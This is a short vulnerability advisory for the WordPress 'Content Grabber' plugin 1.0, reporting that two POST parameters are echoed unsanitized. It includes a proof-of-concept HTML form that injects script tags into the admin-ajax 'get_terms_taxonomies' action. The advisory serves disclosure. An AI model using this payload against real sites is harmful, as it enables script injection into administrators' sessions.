Title: WordPress 'Content Grabber' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-14
Download: 
- https://wordpress.org/plugins/content-grabber/
- https://plugins.svn.wordpress.org/content-grabber/
Notified WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
A plugin to help you grab content of any post type and display them as you want

## Vulnerabilities
==========================================================
Two POST parameters (obj_field_name and obj_field_id) are printed unsanitized when the 'get_terms_taxonomies' action is executed. 

PoC: 

Log in as admin and submit the following request:

<form method="POST" action="[URL]/wp-admin/admin-ajax.php"> 
 	<input type="text" name="action" value="get_terms_taxonomies"><br />
	<input type="text" name="post_type" value="post" ><br />
	<input type="text" name="obj_field_name" value="widget-cg_content_grabber[3][cat_id]&quot;><script>alert(1)</script>" ><br />
	<input type="text" name="obj_field_id" value="widget-cg_content_grabber-3-cat_id&quot;><script>alert(2)</script>" ><br />
	<input type="text" name="cat_id_array" value="[&quot;1&quot;]" ><br />
	<input type="submit">
</form>

## Solution
==========================================================
No fix available

==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.